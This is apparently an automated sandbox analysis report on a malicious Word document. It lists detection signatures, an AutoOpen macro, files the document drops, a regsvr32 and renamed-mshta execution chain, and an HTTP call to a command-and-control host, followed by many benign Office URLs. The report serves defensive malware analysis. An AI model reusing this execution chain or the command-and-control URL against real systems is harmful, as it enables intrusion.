Play interactive tour

Edit tour

Analysis Report documenti 12.01.20.doc

Overview

General Information

Sample Name:	documenti 12.01.20.doc
Analysis ID:	326338
MD5:	f530de77053a5c25a94f930bb954bcf8
SHA1:	46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4
SHA256:	1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82
Most interesting Screenshot:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Multi AV Scanner detection for submitted file

Sigma detected: BlueMashroom DLL Load

Creates processes via WMI

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Machine Learning detection for sample

Office process drops PE file

Sigma detected: Regsvr32 Anomaly

Allocates memory with a write watch (potentially for evading sandboxes)

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains an embedded VBA macro which reads document properties (may be used for disguise)

Document contains embedded VBA macros

Document contains no OLE stream with summary information

Document has an unknown application name

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

WINWORD.EXE (PID: 1844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

ms.com (PID: 5308 cmdline: C:\users\public\ms.com C:\users\public\ms.html MD5: 7083239CE743FDB68DFC933B7308E80A)

regsvr32.exe (PID: 6192 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\users\public\ms.com C:\users\public\ms.html, ParentImage: C:\Users\Public\ms.com, ParentProcessId: 5308, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, ProcessId: 6192

Sigma detected: Regsvr32 Anomaly

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: documenti 12.01.20.doc

Virustotal: Detection: 29%

Perma Link

Machine Learning detection for sample

Show sources

Source: documenti 12.01.20.doc

Joe Sandbox ML: detected

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: ms.com.0.dr

Jump to dropped file

Source: global traffic

DNS query: name: nfj254aim.com

Source: global traffic

TCP traffic: 192.168.2.3:49711 -> 104.28.6.227:80

Source: global traffic

TCP traffic: 192.168.2.3:49711 -> 104.28.6.227:80

Source: global traffic

HTTP traffic detected: GET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nfj254aim.comConnection: Keep-Alive

Source: global traffic

Source: unknown

DNS traffic detected: queries for: nfj254aim.com

Source: ms.com, 00000001.00000003.224033467.0000000006E03000.00000004.00000040.sdmp	String found in binary or memory: http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.office.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://augloop.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://cdn.entity.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://cortana.ai
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://cr.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://directory.services.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://graph.windows.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: ms.com, 00000001.00000002.228795664.0000000006A27000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://login.windows.local
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://management.azure.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://management.azure.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://outlook.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://tasks.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: documenti 12.01.20.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module aH8xms, Function AutoOpen			Name: AutoOpen

Source: documenti 12.01.20.doc

OLE, VBA macro line: a8qpd = activedocument.builtindocumentproperties(afav8)

Source: documenti 12.01.20.doc

OLE indicator, VBA macros: true

Source: documenti 12.01.20.doc

OLE indicator has summary info: false

Source: documenti 12.01.20.doc

OLE indicator application name: unknown

Source: Joe Sandbox View

Dropped File: C:\Users\Public\ms.com CBAB3546BDDB2E4EA340C1A7DF680DA6C4F4F2F18B8E98F6D4B66926183E269E

Source: C:\Users\Public\ms.com

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal88.expl.winDOC@4/13@1/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{54A156AB-5F10-4F71-BDCB-FB371509B3D5} - OProcSessId.dat

Jump to behavior

Source: documenti 12.01.20.doc	OLE document summary: title field not present or empty
Source: documenti 12.01.20.doc	OLE document summary: author field not present or empty
Source: documenti 12.01.20.doc	OLE document summary: edited time not present or 0

Source: C:\Users\Public\ms.com	Command line argument: Kernel32.dll	1_2_00B31460
Source: C:\Users\Public\ms.com	Command line argument: WLDP.DLL	1_2_00B31460
Source: C:\Users\Public\ms.com	Command line argument: kernel32.dll	1_2_00B31460

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\ms.com

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\ms.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\Public\ms.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: documenti 12.01.20.doc

Virustotal: Detection: 29%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Users\Public\ms.com C:\users\public\ms.com C:\users\public\ms.html
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp
Source: C:\Users\Public\ms.com	Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp	Jump to behavior

Source: C:\Users\Public\ms.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Users\Public\ms.com

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: mshta.pdbGCTL source: ms.com, 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, ms.com.0.dr
Source:	Binary string: mshta.pdb source: ms.com, ms.com.0.dr

Source: C:\Users\Public\ms.com

Code function: 1_2_00B31460 #650,SetProcessDEPPolicy,rand_s,VirtualAlloc,GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,RegisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,

1_2_00B31460

Source: C:\Users\Public\ms.com

Code function: 1_2_00B32091 push ecx; ret

1_2_00B320A4

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

